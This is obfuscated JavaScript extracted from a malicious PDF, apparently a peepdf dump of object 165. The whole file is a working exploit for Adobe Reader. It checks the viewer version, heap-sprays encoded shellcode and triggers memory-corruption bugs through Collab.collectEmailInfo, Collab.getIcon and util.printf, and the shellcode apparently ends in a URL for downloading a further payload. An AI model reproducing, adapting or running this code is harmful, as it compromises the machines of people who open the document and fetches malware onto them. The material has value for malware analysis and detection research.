// peepdf comment: Javascript code located in object 165 (version 0)

var xyutequex = false;
var wochechuc = new Array();

function hethithyq() {}
function wexyixyat() {}
var thexye;

function cazethexy(cazethexy) {
    return true;
}
this.pecuwo = 24560;

function kazuq(mochyb, fabaquochu) {
    function thith(thith) {
        return thith;
    }
    while (mochyb.length * 2 < fabaquochu) mochyb += mochyb;
    this.quynopaque = 'quynopaque';
    mochyb = mochyb.substring(0, fabaquochu / 2);

    function natoj(natoj) {
        return natoj;
    }
    return mochyb;
}
this.laxyeth = false;

function tychux(gabuz) {
    var nithochyp = false;
    var xyicedax = 0x0c0c0c0c;
    var queth = false;
    var cotuchuvuq = false;
    var xyymichan = new Array('%u4343%u', '4343%u43', '43%u0FEB', '%u335B', '%u66C9%u', '80B9%u80', '01%uE', 'F33%uE2', '43%uE', 'BFA%u', 'E805%uF', 'FEC%uFF', 'FF%u8B7F', '%uDF4', 'E%uEFEF', '%u64EF%u', 'E3AF%u9', 'F64%u42F', '3%u9F64%', 'u6EE7', '%uEF03%', 'uEFEB%u6', '4EF%uB90', '3%u61', '87%uE1A1', '%u0703%u', 'EF11%uEF', 'EF%uAA', '66%uB9EB', '%u7787', '%u6511', '%u07E1', '%uEF1F%u', 'EFEF%uAA', '66%uB9E7', '%uCA87%', 'u105F%u0', '72D%uE', 'F0D%uE', 'FEF%uAA', '66%uB', '9E3%u00', '87%u0F', '21%u078F', '%uEF3B%u', 'EFEF%', 'uAA66%u', 'B9FF%u', '2E87%', 'u0A96%u0', '757%u', 'EF29%u', 'EFEF%uA', 'A66%u', 'AFFB%uD', '76F%u', '9A2C%u66', '15%uF7', 'AA%uE', '806%uEFE', 'E%uB1EF%', 'u9A66%u6', '4CB%uEBA', 'A%uEE8', '5%u64B', '6%uF7BA', '%u07B9%', 'uEF64', '%uEFEF%u', '87BF%uF', '5D9%u9', 'FC0%u780', '7%uEFEF%', 'u66EF%u', 'F3AA%', 'u2A64%', 'u2F6C%u', '66BF%u', 'CFAA%u1', '087%uEFE', 'F%uBFEF%', 'uAA64', '%u85FB%u', 'B6ED%uB', 'A64%u07', 'F7%uEF8E', '%uEFEF', '%uAAEC%u', '28CF%uB', '3EF%u', 'C191%', 'u288A%', 'uEBAF%', 'u8A97%uE', 'FEF%u9A', '10%u64', 'CF%uE', '3AA%uEE', '85%u64', 'B6%uF7BA', '%uAF07%', 'uEFEF', '%u85EF%u', 'B7E8%', 'uAAEC', '%uDCCB', '%uBC3', '4%u10B', 'C%uCF', '9A%uBCBF', '%uAA64%', 'u85F3', '%uB6EA%u', 'BA64%u0', '7F7%uEFC', 'C%uEFE', 'F%uEF8', '5%u9A', '10%u64C', 'F%uE7', 'AA%uED8', '5%u64B6', '%uF7B', 'A%uFF07%', 'uEFEF%', 'u85EF%', 'u6410%', 'uFFAA', '%uEE8', '5%u64B6', '%uF7BA%u', 'EF07%u', 'EFEF%u', 'AEEF%uB', 'DB4%u0', 'EEC%u0EE', 'C%u0E', 'EC%u0', 'EEC%u0', '36C%u', 'B5EB%u', '64BC%u0', 'D35%uBD1', '8%u0F1', '0%u64BA%', 'u6403%u', 'E792%uB', '264%u', 'B9E3%u9C', '64%u64', 'D3%uF19', 'B%uEC9', '7%uB9', '1C%u996', '4%uECC', 'F%uDC', '1C%uA6', '26%u42', 'AE%u2CEC', '%uDCB9%u', 'E019%uF', 'F51%u1D', 'D5%uE7', '9B%u212', 'E%uECE2', '%uAF1D%u', '1E04%u', '11D4%u', '9AB1%', 'uB50A%u', '0464%uB', '564%uECC', 'B%u89', '32%uE364', '%u64A4%', 'uF3B5%u', '32EC%', 'uEB64%u', 'EC64%u', 'B12A%u2', 'DB2%uE', 'FE7%u', '1B07%u', '1011%uB', 'A10%uA', '3BD%uA', '0A2%uEFA', '1%u746', '8%u707', '4%u2F3A', '%u772', 'F%u726F', '%u646', 'C%u6977', '%u6564%u', '752D%u61', '73%u63', '2E%u6D', '6F%u7', '72F%u62', '65%u6C61', '%u7A69%u', '7265%', 'u6C2F%', 'u6E61%u', '6964%u', '676E%u', '652F%u6', '578%u', '702E%', 'u7068%u7', '83F%u7', '03D%u', '6664');

    function kychojop(kychojop) {
        return true;
    }
    xyythoch = xyymichan.join("");
    var quachytho = 9814;
    var thicho = 'thicho';
    var quafynuquo = eval("un" + "es" + "ca" + "pe" + "")(xyythoch);

    function cytichich(cytichich) {
        return cytichich;
    }
    var xyewud = 13398;
    if (gabuz == 1) {
        this.choxye = false;
        xyicedax = 0x30303030;

        function pedip(pedip) {
            return true;
        }
        quafynuquo = eval("un" + "es" + "ca" + "pe" + "")(xyythoch);
        this.chevyfemaq = "chevyfemaq";
    } else if (gabuz == 2) {
        var xyajy = 'xyajy';
        quafynuquo = eval("une" + "sca" + "pe" + "")(xyythoch);

        function xyisupody(xyisupody) {
            return true;
        }
    }
    var cyquelejaq = false;

    function thochy() {}
    this.jogixyu = 1171;
    var quovequiva = 0x400000;
    var parethece = false;
    var rycofychum = quafynuquo.length * 2;
    this.xyycha = false;
    var fabaquochu = quovequiva - (rycofychum + 0x38);
    this.fucaquich = 'fucaquich';
    var mochyb = eval("une" + "sca" + "pe" + "")("%u909" + "0%u90" + "90" + "");

    function wecaxya(wecaxya) {
        return true;
    }
    mochyb = kazuq(mochyb, fabaquochu);

    function chequoc() {}
    var bijuja = (xyicedax - 0x400000) / quovequiva;
    this.thyque = 'thyque';
    for (var zeduxy = 0; zeduxy < bijuja; zeduxy++) wochechuc[zeduxy] = mochyb + quafynuquo;

    function quesuz(quesuz) {
        return true;
    }
}
function xyejywed() {
    var xyixyuquac = 'xyixyuquac';
    var micachy = 0;
    this.chuthoc = "chuthoc";
    var kaxyucochi = app.viewerVersion.toString();

    function quothete(quothete) {
        return true;
    }
    app.clearTimeOut(thexye);
    this.chahach = "chahach";
    if ((kaxyucochi >= 8 && kaxyucochi < 8.102) || kaxyucochi < 7.1) {
        this.quakaxyi = false;
        tychux(0);

        function xyuchonyq(xyuchonyq) {
            return true;
        }
        var requochos = unescape("%u" + "0c" + "0c" + "%u" + "0c" + "0c" + "");
        var xyimy = 21631;
        while (requochos.length < 0xaf98) requochos += requochos;
        var xyeth = false;
        eval("this")["co" + "ll" + "ab" + "St" + "or" + "e" + ""] = eval("Col" + "lab" + "")["co" + "ll" + "ec" + "tE" + "ma" + "il" + "In" + "fo" + ""]({
            subj: "dilyxyyqu",
            msg: requochos
        });
        var jequed = 'jequed';
    }
    if ((kaxyucochi >= 8.102 && kaxyucochi < 8.104) || (kaxyucochi >= 9 && kaxyucochi < 9.1) || kaxyucochi <= 7.101) {
        try {
            if (app["do" + "c" + ""]["Co" + "ll" + "ab" + ""]["get" + "Ico" + "n" + ""]) {
                function dachi(dachi) {
                    return dachi;
                }
                tychux(2);
                this.thexyi = "thexyi";
                var dumizec = eval("un" + "es" + "ca" + "pe" + "")("%09");
                var masyxyuch = 'masyxyuch';
                this.xyychy = 'xyychy';
                while (dumizec.length < 0x4000) dumizec += dumizec;
                this.xyyxyas = 11155;
                dumizec = "N." + dumizec;

                function chiquuchib(chiquuchib) {
                    return true;
                }
                eval("ap" + "p" + "")["do" + "c" + ""]["Co" + "ll" + "ab" + ""]["ge" + "tI" + "co" + "n" + ""](dumizec);
                var thada = 'thada';
                micachy = 1;

                function xyuchocho(xyuchocho) {
                    return true;
                }
            } else micachy = 1;
        } catch (e) {
            micachy = 1;
        }
        if (micachy == 1) {
            if (kaxyucochi == 8.102 || kaxyucochi == 7.1) {
                tychux(1);
                this.dykexy = 15280;
                var tyxyecechi = 12954;
                eval("ut" + "il" + "")["pri" + "ntf" + ""]("%4" + "50" + "00" + "f" + "", "1299999999999999" + "9999888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "88888888" + "");
            }
        }
    }
}
app.chiny = xyejywed;

function noquifyqu(noquifyqu) {
    return noquifyqu;
}
thexye = app.setTimeOut("app.chiny()", 10);

